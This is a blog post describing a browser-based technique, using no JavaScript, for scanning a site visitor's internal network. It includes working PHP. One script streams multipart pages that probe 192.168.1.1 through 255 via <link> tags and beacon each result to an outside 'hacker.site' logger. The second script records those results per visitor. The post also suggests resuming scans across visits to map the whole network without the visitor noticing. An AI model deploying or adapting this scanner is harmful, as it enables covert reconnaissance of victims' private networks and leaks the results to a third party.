The concept of doing network scanning via JavaScript is hardly new and is quite easy for anyone with even cursory knowledge of JavaScript. However, the assumption was that as long as you browse the web with JavaScript disabled you are safe from hostile sites from scanning your network. Alas, this was not to be, in a
Jeremiah Grossman shows how can this be done with plain HTML using no JavaScript what so ever.
His methodology relies on Firefox's quirk, whereby the page loading would wait for the <link> tag to be processed before rendering the rest of the page. This means you could use the link tag to reference local IPs and use a subsequent image to see how long did it take for the IP to respond. If the response was very quick, then you know the host has something listening on a given port and if it does not, well then the port is being blocked or filtered.
The problem with his approach is that to scan an entire network would be rather slow and require multiple iframes to perform the scan. Not to mention very noticeable, I decided to see if something can be done about this limitation.
The problem with scanning is that there is no way to set a timeout so, if you encounter a local IP that takes forever to reply your scan is effectively stalled. Jeremiah
tried to resolve this by putting a meta-refresh tag, but it seems Firefox chooses to ignore this tag while waiting for the <link> tag to load.
Fortunately, Firefox, Safari and Opera support a very interesting Content-Type called "multipart/x-mixed-replace".
(It does not work in IE6, but I'd be very curious to know if IE7 supports this or not)
This mime type allows you to send segments of HTML that each represent a page of its own. Every time a browser gets a new segment it throws out the old one and renders the new content. This means you can using pure HTTP replace the content of the page without any HTML, JavaScript, etc... using purely server side languages such as PHP.
PHP:
<?php
$boundary = '----'.rand(1000, 9999).'----';
header('Content-Type: multipart/x-mixed-replace; boundary='.$boundary);
for ($i = 1; $i < 256; $i++) {
echo '
--'.$boundary.'
Content-Type: text/html; charset=utf-8
<p>testing ip <b>192.168.1.'.$i.'</b></p>
<link rel="stylesheet" type="text/css" href="http://192.168.1.'.$i.'/" />
<img src="http://hacker.site/scan.php?ip=192.168.1.'.$i.'&s='.time().' />
';
flush();
sleep(3);
}
The above PHP code creates just such a payload, where each "page" prints a little progress indicator followed by a <link> tag pointing to a local IP address. We then have an image pointing to a monitoring script who's job it'll be to record the scanned IP and the time at which the scan was initiated. After this we call the flush() function forcing PHP to dump the current data to screen and wait for 3 seconds. The 3 seconds is our timeout, which in my tests on my network seems to have resulted in the best results, but a different value may work better for you.
This means that we give our scanner roughly 3 seconds to scan an IP after which, regardless of whether we got a response or not we are going to move on to the next address. The process is repeated until we run of IPs or the user leaves the page.
Now on to the scan.php script, which is quite simple, it is just two lines long.
PHP:
<?php
session_start();
file_put_contents(
"/tmp/scan_".session_id().".txt",
"{$_GET['ip']} - {$_GET['s']} {$_SERVER['REQUEST_TIME']}\n",
FILE_APPEND|LOCK_EX
);
The first thing we do is call the session_start() function that creates a new session for the user or resumes an existing one. The session id, will become the unique identifier for the user allowing us to separate scans for separate users. The next line is call to a php 5.2 function
file_put_contents() that writes the result of the scan to a file. Each result line consists of the scanned Ip, time of scan and the timestamp of when the request arrived at the server. In 5.2 you can use the $_SERVER['REQUEST_TIME'] variable for this, in earlier versions of PHP you will need to call the time() function. The function then appends the line to the file, locking it the process to avoid corrupting in the even of multiple writers to the same file.
Another trick would be to store the last scanned IP inside the session, so that when a user comes back to the site you can resume scanning at the last know position rather then starting at the very beginning, allowing you within a few visits to scan the entire network of the user.
Enjoy